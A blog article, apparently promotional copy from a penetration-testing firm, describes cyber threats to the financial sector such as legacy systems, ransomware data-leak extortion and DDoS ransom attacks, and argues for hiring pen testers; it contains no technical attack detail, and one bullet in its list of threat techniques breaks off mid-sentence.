Pen-Testing: Enduring Threats to Financial Sector
- December 17, 2020
- Hiba Sulaiman
While focusing on the needs and rights of the customers, the legislations of different countries underline the importance of pen-testing for banks and financial services companies. Currently, several firms are working relentlessly to restore their networks that have been disrupted by cyber attacks. Banks and financial technology companies around the world are reported victims of ransomware and cyber attacks. Cybercriminals are also attempting breaches by triggering the suspension of ATM transactions overnight and hackers are targeting websites associated with a stock exchange offline using DDoS attacks. Such disruptions not only affect customer services but also impact the confidence of customers in the financial services sector. As a preemptive measure, banks and financial companies are considering pen testing to be a viable solution to these cyber threats. Regulators are also taking notice of these threats and operational resilience has shot to the top agendas around the world after the outbreak of COVID-19. Thus, banks look for trusted pen testing companies to perform pen tests, vulnerability scanning, etc. to ensure they are cybersecurity-ready.
A lot has happened in a year, most notably the largest-scale public health emergencies in this century. Cyber threat actors have not stood still in this period. Many groups have been planning turbulence to exploit victims. The nature of these threats is such that they change little over time. The motivation of these threat actors exists outside of the cyber domain and the internet is a means to achieve their ends. Their tools and techniques evolve, which is most likely to serve as a useful model in the coming years.
Financial services institutions, from central banks to retail banks, all have been struggling with legacy IT infrastructure for years. While most of this is true, the problem is severe in finance due to widespread reliance on the core systems that are many decades old and have come together as mergers and acquisitions. The financial industry mostly relies on software programmed in common business-oriented language, and the number of qualified engineers that can maintain these codebases is decreasing each year. A recent report on IT failures in the financial services sector found that companies are not doing enough to mitigate operational risks posed by legacy technology and that organizations should ensure that they pen-test their legacy systems. Experts argue that legacy systems should use cloud technology. However, this may require careful planning and is not as simple. For instance, legacy login credentials quickly result in breaches if systems are exposed to the internet. Organizations need to sort out such factors before migrating to the cloud.
What is Pen-Testing?
Penetration testing is also known as ethical or whitehat hacking, where pen-testers take a proactive testing approach to discover IT security issues. The main goal is to identify and secure them before malicious attackers can cause any sort of damage. It should not be confused with vulnerability scanning, which is an automated process to search for all known vulnerabilities. Although both types of tests play a crucial role in maintaining a proper cyber hygiene strategy, the reliance on IT makes them a necessity. Mobile apps are commonly being used, which increases the attacks on these devices and apps a great deal. Last year, cyber-attacks have caused 7 banks in the UK alone, to shut down their operations. In these situations, banks are left with no other options, but to hire the right pen testing company.
Although there is a continuous increase in cyber-attacks, the techniques these threats groups use to achieve their goals continue to evolve.
Some of the major threats to the financial system come from organized criminal groups looking forward to stealing funds. A growing trend among these actors has been their progression into deeper levels of financial infrastructure. Most of these groups use sophisticated and advanced pen testing tools that contain features that make detection on enterprise networks difficult. These features include:
- Living-off-the-land techniques
- In-memory infection – Where the malware do
- Domain name system (DNS)
Ransom and Extortion
Over the years, ransomware has evolved from phishing attacks via emails to attacks against large organizations and institutions causing huge damages on a regular basis. While their tactics change, criminal groups, steal data from company networks prior to encryption and threaten to release their critical data publicly if the victims do not pay the ransom.
One of the most common target sectors for such attacks is the industrial and manufacturing companies. However, financial services have also been targeted recently. In 2020, the new data-leaking tactics that criminals are using increases pressure on their victims to pay, otherwise sensitive customer information will be released. By far, this could be more damaging than a traditional encryption attack, where the costs (if no ransom is paid) are only for remediation purposes. The publicity such attacks generate can cause much damage to an organization’s reputation. They use a different type of ransom attack where DDoS techniques are used to create an attack against an organization, rather than ransomware.
Testing Techniques to Improve Cyber Resilience
Regulators have been raising their concerns about cybersecurity risks to the financial services sector. Operational resilience has been the top agenda for financial services regulators. The financial sector heavily relies on trust and their services are designed to be resilient and gain a competitive edge. If organizations do not seek pen testing services the occurrence of disruptions in their services may cause significant harm to the financial market. Thus, to address cyber resilience and help firms identify vulnerabilities that could be exploited by attackers to impact essential business services, they hire a penetration testing company.